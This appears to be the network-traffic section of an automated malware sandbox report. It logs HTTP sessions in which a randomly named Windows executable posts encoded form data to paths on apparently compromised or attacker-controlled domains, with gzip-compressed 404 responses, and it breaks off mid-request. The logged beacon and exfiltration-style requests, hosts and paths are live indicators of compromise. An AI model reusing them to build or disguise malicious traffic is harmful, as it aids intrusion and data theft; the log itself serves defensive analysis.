nl=o9/euJtDoA2P38xaVXpTM2CwkYLhrXvoUOEzqeBL4N6Oh6gLekwqaFKAfYgp68Gru9dsczyXOU65pljUivgKMo4sQo9/M926ZsBq2JxgePCnIKCqcDN5kpNmjK70cHLFc2aer/HC1MJuaBRQ74Xp9UEOh7NY7N6WbXmtsveN9TFjSFzAW/kDO47JNGkZN4Q+urgvM6E=
Nov 1, 2024 03:45:52.815510988 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:45:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding x-powered-by: WP Engine Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8db88d1c1d203168-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED] Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(\|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
Nov 1, 2024 03:45:52.815582037 CET	1236	IN	Data Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'#bf8K42~3a
Nov 1, 2024 03:45:52.815633059 CET	1236	IN	Data Raw: 9e 91 0c b3 27 d5 9e 87 58 d2 89 c9 90 f0 f0 c8 b3 a8 03 27 39 0e 2e 0a 92 c7 ef 46 34 8d 1b d2 9c d7 99 f9 37 ce 32 2a c8 f1 71 83 85 c6 a4 78 5f 9d d4 3e eb 5c 2b 0c 4b 84 5f 75 44 5a a5 57 7c b3 72 a7 4c c5 22 9c a9 98 97 23 9a 27 dd 23 cf 5a Data Ascii: 'X'9.F472*qx_>\+K_uDZW\|rL"#'#Z=H!N1-_qqP!ah?}Na8&akaej k56fd13fHNJ~~ukyCNuR3RmLN8NyC{3ykmJ=
Nov 1, 2024 03:45:52.815668106 CET	636	IN	Data Raw: 5b b2 f7 ac c0 3b b3 fc a6 f7 28 f7 1a 97 00 09 b6 b8 d7 2e 33 04 ed c0 f2 cf da 96 b7 32 03 34 b6 2d df 2b 1b bf 4b 14 cd 72 65 0d 15 12 bb f9 57 58 95 76 08 bc 53 ab d5 b1 5a 9d c7 98 c3 32 6b 39 14 78 0a 6c 1f 26 81 1d 83 10 34 cf ac f2 ff 95 Data Ascii: [;(.324-+KreWXvSZ2k9xl&4t-eGsyftN-+h`+>[~CnjZji,k[g&:[uf>jA:~XAS>C+hyqS<?e^;S[Vm&j/{gu}4=TlZT<?
Nov 1, 2024 03:45:52.815704107 CET	1236	IN	Data Raw: 66 ab 47 81 e3 45 5b 96 af 14 d4 f3 f2 9d a0 fd 5d b8 15 a6 0b 5c 67 84 85 de b9 e8 f5 6d b9 03 46 77 98 37 b6 ef 72 cc ea 21 82 a6 b1 b9 a8 d9 93 dc 26 5a 0d 65 b5 09 da 93 9c 82 ad a1 b1 dc 24 ed 49 67 09 5f 43 6b b9 6a dc 93 d6 12 be 86 56 fd Data Ascii: fGE[]\gmFw7r!&Ze$Ig_CkjVt?+'Pu6w{R@j#Vp%VyVz]D5JE\^/d&gP/<gp{VyA{gg\|BzP~Ozk~O>{j{gz,sxEr@\|{'P
Nov 1, 2024 03:45:52.815757990 CET	820	IN	Data Raw: a5 48 6e e9 02 60 a6 85 e8 95 c1 9e d0 38 21 12 e9 5f d7 50 ec 90 30 4e 49 99 e4 94 07 06 eb b0 0b 1f fc c8 84 44 5f 04 89 d1 bb 25 56 df 1d 05 4b c4 f1 c2 c6 60 72 ba 20 12 61 a9 5e 79 b0 61 32 30 2e 7e 65 28 aa a0 a7 f4 a2 c4 70 97 e8 3a 3a b5 Data Ascii: Hn`8!_P0NID_%VK`r a^ya20.~e(p::.v.>A@/..T85f,tJZA_7:3@cMrjK-R!eKdtGt_r( #EK+0o";<XB\n7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49896	141.193.213.10	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:45:54.671297073 CET	755	OUT	POST /9g6s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.meanttobebroken.org Origin: http://www.meanttobebroken.org Referer: http://www.meanttobebroken.org/9g6s/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 6f 39 2f 65 75 4a 74 44 6f 41 32 50 33 63 42 61 4f 30 42 54 4e 57 43 7a 75 34 4c 68 68 33 76 30 55 4f 34 7a 71 61 5a 68 34 34 71 4f 68 65 73 4c 66 67 6b 71 5a 46 4b 41 48 49 68 43 6b 4d 47 65 75 39 52 65 63 79 4f 58 4f 56 61 35 70 6d 33 55 6a 66 63 4c 4f 34 34 79 5a 49 39 39 54 74 32 36 5a 73 42 71 32 49 56 4b 65 50 61 6e 4c 36 79 71 64 68 6c 32 6e 70 4e 6c 33 61 37 30 58 6e 4c 5a 63 32 61 38 72 2b 62 6b 31 4b 46 75 61 44 5a 51 36 73 44 75 30 55 45 49 2f 4c 4d 63 77 64 6a 53 42 42 6e 68 6f 64 62 33 6f 52 52 71 61 54 43 71 4d 64 73 72 64 59 58 78 64 56 73 75 63 49 78 58 30 49 77 66 53 74 52 54 78 4d 34 71 35 59 79 68 65 45 36 7a 54 54 78 56 50 4b 79 67 Data Ascii: nl=o9/euJtDoA2P3cBaO0BTNWCzu4Lhh3v0UO4zqaZh44qOhesLfgkqZFKAHIhCkMGeu9RecyOXOVa5pm3UjfcLO44yZI99Tt26ZsBq2IVKePanL6yqdhl2npNl3a70XnLZc2a8r+bk1KFuaDZQ6sDu0UEI/LMcwdjSBBnhodb3oRRqaTCqMdsrdYXxdVsucIxX0IwfStRTxM4q5YyheE6zTTxVPKyg
Nov 1, 2024 03:45:55.384452105 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:45:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding x-powered-by: WP Engine Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8db88d2c1b422d3e-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED] Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(\|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
Nov 1, 2024 03:45:55.384497881 CET	212	IN	Data Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'
Nov 1, 2024 03:45:55.384507895 CET	1236	IN	Data Raw: 1c 17 23 e3 62 66 fc a0 38 dc 4b a3 bb 9c ab 34 08 e4 16 c3 32 7e d0 90 dd af 33 e3 07 e0 61 74 8d bf 93 c1 67 2a 09 74 d2 b8 82 57 97 9c 5e 4d c8 40 68 e0 31 4f 1f 01 36 2c 43 69 dd ad d3 d6 32 62 a2 75 a5 2c 37 ba 86 61 19 05 03 db 50 9c fe 18 Data Ascii: #bf8K42~3atg*tW^M@h1O6,Ci2bu,7aPyB]%h.l$+R,#2L(ZHNdn-1ScI!1f4'Vu>Gj8saF'z8UAEaraMg,?v
Nov 1, 2024 03:45:55.384597063 CET	1236	IN	Data Raw: 97 be 52 6d ad 4c 4e 8b 9c 38 4e d3 79 43 09 7b 94 9b 33 90 79 6b 14 1d 1f d7 f5 6d 04 4a 3d d0 97 df 7f 39 3e fe f2 fb 2f a5 f7 7d 52 b2 ab c6 3a e8 b7 29 1b 98 2b 73 1b 05 13 f2 23 11 02 27 a4 61 bc 1e 3a 92 7d 56 53 6e c3 7c 6d 34 8c d7 5f 37 Data Ascii: RmLN8NyC{3ykmJ=9>/}R:)+s#'a:}VSn\|m4_7faaZUT972i+w5D{psoh5D`n_q;,NaFrr3cK6 +CVasbxC>9"o!1.m=>^t8
Nov 1, 2024 03:45:55.384608984 CET	424	IN	Data Raw: 6d b5 da 26 6a 2f 98 7b a7 96 67 75 82 bd 7d 34 1e 8b db 3d 54 6c 5a be 1f ac 54 3c 3f 87 a4 e0 9f 07 2b ce 9d b6 75 76 06 d1 fa 18 6b 95 2b 59 44 1e c9 06 8a 6f 4b f1 5e f1 3d 0b 54 7a 0a fc 0a 63 18 ef ce a9 e5 9f 3d 1a 98 24 05 7f a4 11 34 09 Data Ascii: m&j/{gu}4=TlZT<?+uvk+YDoK^=Tzc=$4(JM5~e4\|i~\|c-\pv,/vApE.X+x&<"i84HtH"GE94vy]vNZwv:G*
Nov 1, 2024 03:45:55.384618998 CET	1236	IN	Data Raw: 66 ab 47 81 e3 45 5b 96 af 14 d4 f3 f2 9d a0 fd 5d b8 15 a6 0b 5c 67 84 85 de b9 e8 f5 6d b9 03 46 77 98 37 b6 ef 72 cc ea 21 82 a6 b1 b9 a8 d9 93 dc 26 5a 0d 65 b5 09 da 93 9c 82 ad a1 b1 dc 24 ed 49 67 09 5f 43 6b b9 6a dc 93 d6 12 be 86 56 fd Data Ascii: fGE[]\gmFw7r!&Ze$Ig_CkjVt?+'Pu6w{R@j#Vp%VyVz]D5JE\^/d&gP/<gp{VyA{gg\|BzP~Ozk~O>{j{gz,sxEr@\|{'P
Nov 1, 2024 03:45:55.384629965 CET	212	IN	Data Raw: a5 48 6e e9 02 60 a6 85 e8 95 c1 9e d0 38 21 12 e9 5f d7 50 ec 90 30 4e 49 99 e4 94 07 06 eb b0 0b 1f fc c8 84 44 5f 04 89 d1 bb 25 56 df 1d 05 4b c4 f1 c2 c6 60 72 ba 20 12 61 a9 5e 79 b0 61 32 30 2e 7e 65 28 aa a0 a7 f4 a2 c4 70 97 e8 3a 3a b5 Data Ascii: Hn`8!_P0NID_%VK`r a^ya20.~e(p::.v.>A@/..T85f,tJZA_7:3@cMrjK-R!eKdtGt_r(
Nov 1, 2024 03:45:55.384673119 CET	608	IN	Data Raw: 23 14 a2 45 0d 4b e5 2b 30 6f a7 1f e2 06 da 22 b1 d9 3b 3c 58 d6 42 b2 5c cb f3 6e 04 c7 37 9a fe 01 1d a2 c6 92 83 a3 45 14 5f 57 2d 5a 48 12 7f 80 cf a5 a0 6f ba 34 0f 1d 85 21 3a 39 41 9a c4 c1 52 aa 65 ee 81 59 09 85 2a 21 ad 68 aa a7 5a 7a Data Ascii: #EK+0o";<XB\n7E_W-ZHo4!:9AReY!hZzP;22$yDX/V22E)d9\|dD&#1k(+90FpC"SJ^e]Vu/Gjx,40v+'`*85vc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49912	141.193.213.10	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:45:57.221460104 CET	1772	OUT	POST /9g6s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.meanttobebroken.org Origin: http://www.meanttobebroken.org Referer: http://www.meanttobebroken.org/9g6s/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 6f 39 2f 65 75 4a 74 44 6f 41 32 50 33 63 42 61 4f 30 42 54 4e 57 43 7a 75 34 4c 68 68 33 76 30 55 4f 34 7a 71 61 5a 68 34 34 69 4f 69 74 6b 4c 51 68 6b 71 59 46 4b 41 4c 6f 67 6c 6b 4d 47 48 75 39 4a 67 63 79 43 68 4f 51 65 35 6f 45 76 55 6b 74 34 4c 45 34 34 79 55 6f 39 2b 4d 39 33 67 5a 73 52 75 32 4a 6c 4b 65 50 61 6e 4c 35 71 71 4e 44 4e 32 68 70 4e 6d 6a 4b 37 47 63 48 4c 6c 63 31 72 42 72 2b 4f 5a 31 36 6c 75 61 6a 4a 51 34 61 2f 75 37 55 45 4b 2b 4c 4d 36 77 64 66 64 42 42 53 51 6f 63 76 4e 6f 54 42 71 5a 6c 33 31 56 66 38 42 42 2b 48 55 57 6d 67 4b 4e 73 6f 78 31 65 6f 55 49 2f 4a 55 31 65 67 41 34 4f 65 57 4e 6c 7a 71 4f 58 64 75 41 65 50 58 78 46 52 53 61 79 56 73 59 6b 55 54 68 31 37 6f 6d 6d 76 52 75 53 2f 6d 2f 61 2f 58 33 77 66 46 4c 49 61 73 7a 47 72 6a 42 4b 35 30 48 78 44 71 4d 36 2b 37 59 50 4d 69 64 50 37 6a 74 35 67 59 75 48 31 42 32 33 52 31 75 6c 51 4a 65 74 37 55 4f 6c 54 51 53 75 70 50 4d 38 77 37 45 36 2b 76 52 6a 2b 5a 72 37 2f 39 6a 61 72 55 37 49 7a 32 62 34 46 [TRUNCATED] Data Ascii: nl=o9/euJtDoA2P3cBaO0BTNWCzu4Lhh3v0UO4zqaZh44iOitkLQhkqYFKALoglkMGHu9JgcyChOQe5oEvUkt4LE44yUo9+M93gZsRu2JlKePanL5qqNDN2hpNmjK7GcHLlc1rBr+OZ16luajJQ4a/u7UEK+LM6wdfdBBSQocvNoTBqZl31Vf8BB+HUWmgKNsox1eoUI/JU1egA4OeWNlzqOXduAePXxFRSayVsYkUTh17ommvRuS/m/a/X3wfFLIaszGrjBK50HxDqM6+7YPMidP7jt5gYuH1B23R1ulQJet7UOlTQSupPM8w7E6+vRj+Zr7/9jarU7Iz2b4FcuViMjD5LbVB5eWgUC7N9q+SKmVvNUjLqN1W1NRna5CwFDxUx38uaaNF3+Wwt1iFMEh3vRsWzCWqrH0WffL6S9OkRTgUoMBLQArw8ZIalo8DZnGkagdLSB9kwz5v0ZuOadj1rP/hxMnj8+R1itCXQjgXxxcThn1sIaQ/SFOMC4AkEQ6GoI2bGojZ6bwUiA7dVWUP/W7w9Jq0hAUmhkw4mdJNuqDUeMezyedke30IKezJVrkRvMwHmASSS1u0we4qO/sgPg7b18jKl3Zzrzt0ZuONqHz5JnDywRy1DMFsAsyJSxLmSYSecZHnjsihWldZYm5eaAu7KtJwgKNomyvOboH41GbICkmSEgBGXRKr+1V1S+efyS/5YQioilDeMAcR/4RUJdKSvS11ZQxxbq/toUyecH9KLj6YCuloyS0n5kPykNvjl1LDYWSsPMzx0TyMYs/h2GCSgEkXlYEDp8opUabPQ1fjCDdA7Tj0F1UZbKNziLrHRMFaM7QbfbidxnKsTtyzyI5cuslc09MUFjOreWFifKwe2Qnf0M17Oi97CPMGkwAqWZq2tB2C4LSppWD/Q35nL4tMup+F2iWG9xT+1P2vVAl6MUtQ/Xr0+5WgBBtkbfx1QBjJoGxNTGo8KkViSBmoNaRclTQLEKgWNEyNk+qyYz3urwTWwV [TRUNCATED]
Nov 1, 2024 03:45:57.930557966 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:45:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding x-powered-by: WP Engine Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8db88d3c1b2e2cd5-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED] Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(\|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
Nov 1, 2024 03:45:57.930572033 CET	1236	IN	Data Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'#bf8K42~3a
Nov 1, 2024 03:45:57.930583954 CET	1236	IN	Data Raw: 9e 91 0c b3 27 d5 9e 87 58 d2 89 c9 90 f0 f0 c8 b3 a8 03 27 39 0e 2e 0a 92 c7 ef 46 34 8d 1b d2 9c d7 99 f9 37 ce 32 2a c8 f1 71 83 85 c6 a4 78 5f 9d d4 3e eb 5c 2b 0c 4b 84 5f 75 44 5a a5 57 7c b3 72 a7 4c c5 22 9c a9 98 97 23 9a 27 dd 23 cf 5a Data Ascii: 'X'9.F472*qx_>\+K_uDZW\|rL"#'#Z=H!N1-_qqP!ah?}Na8&akaej k56fd13fHNJ~~ukyCNuR3RmLN8NyC{3ykmJ=
Nov 1, 2024 03:45:57.930649996 CET	1236	IN	Data Raw: 5b b2 f7 ac c0 3b b3 fc a6 f7 28 f7 1a 97 00 09 b6 b8 d7 2e 33 04 ed c0 f2 cf da 96 b7 32 03 34 b6 2d df 2b 1b bf 4b 14 cd 72 65 0d 15 12 bb f9 57 58 95 76 08 bc 53 ab d5 b1 5a 9d c7 98 c3 32 6b 39 14 78 0a 6c 1f 26 81 1d 83 10 34 cf ac f2 ff 95 Data Ascii: [;(.324-+KreWXvSZ2k9xl&4t-eGsyftN-+h`+>[~CnjZji,k[g&:[uf>jA:~XAS>C+hyqS<?e^;S[Vm&j/{gu}4=TlZT<?
Nov 1, 2024 03:45:57.930660963 CET	1236	IN	Data Raw: ce bc b5 c1 bc 04 da e4 bf aa 4c 5b 14 8f e1 82 ea 72 2c 77 9f b2 b2 49 61 43 a9 a8 2a 28 ab 10 7b 1f 53 f9 e5 f7 0f f5 45 6e f1 5a 91 db ef 9f 7f da 87 d1 7d 96 f2 22 72 8a 51 f1 86 8b 58 d7 af b9 fa d3 0e 87 87 7d 75 f1 53 56 ab 12 ce 19 6f 79 Data Ascii: L[r,wIaC*({SEnZ}"rQX}uSVoy-4R7(V46">r,j}qC14<H_Ccq+hJ;qLr#-E]uzC~LP#0Uu`;D5([@)KPP}@}%8
Nov 1, 2024 03:45:57.930670977 CET	220	IN	Data Raw: 46 38 87 fc 81 de 32 cc e3 12 e8 1d 2b a6 1c b6 b0 e8 38 62 c5 b4 87 02 2f 68 a1 87 e0 0e fa 31 4d 91 82 14 08 ce ef f8 1d 81 b5 76 b1 69 35 9d 6e d4 e3 32 ff af a6 07 65 46 9a 0f 59 f9 35 2e 57 9b b4 4c fe 8b 24 af b7 ea 2b b4 57 6a b5 af b7 bc Data Ascii: F82+8b/h1Mvi5n2eFY5.WL$+Wj)`fyJ<vR})nmP?TOg48(% \|y\|'~lU\|t ;UM6]8Q97S0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49927	141.193.213.10	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:45:59.761868954 CET	473	OUT	GET /9g6s/?nl=l/X+t9hb8CWGjOR1O2ZzXFDzhtuUnyzAQ4EIxPlc4MjqsNc2fQ5FEV3oB4t5s/ThvfRNUBaEClSQ3k3rscZvHeg0TpQiQ+GxS8ts4a8QVaH5DaPjZQFNvIogjfSTI3KXDA==&dbL=d8WX_v0PGVHXAtK HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.meanttobebroken.org User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:46:00.483177900 CET	664	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 01 Nov 2024 02:46:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: WP Engine Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Redirect-By: WordPress Location: http://meanttobebroken.org/9g6s/?nl=l/X+t9hb8CWGjOR1O2ZzXFDzhtuUnyzAQ4EIxPlc4MjqsNc2fQ5FEV3oB4t5s/ThvfRNUBaEClSQ3k3rscZvHeg0TpQiQ+GxS8ts4a8QVaH5DaPjZQFNvIogjfSTI3KXDA==&dbL=d8WX_v0PGVHXAtK X-Cacheable: non200 Cache-Control: max-age=600, must-revalidate X-Cache: MISS X-Cache-Group: normal CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8db88d4becd73594-DFW alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49959	8.210.3.99	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:05.532295942 CET	708	OUT	POST /li8d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.jexiz.shop Origin: http://www.jexiz.shop Referer: http://www.jexiz.shop/li8d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 68 6b 57 52 73 56 78 65 46 66 74 73 70 63 6f 57 66 70 6d 2f 48 4d 72 73 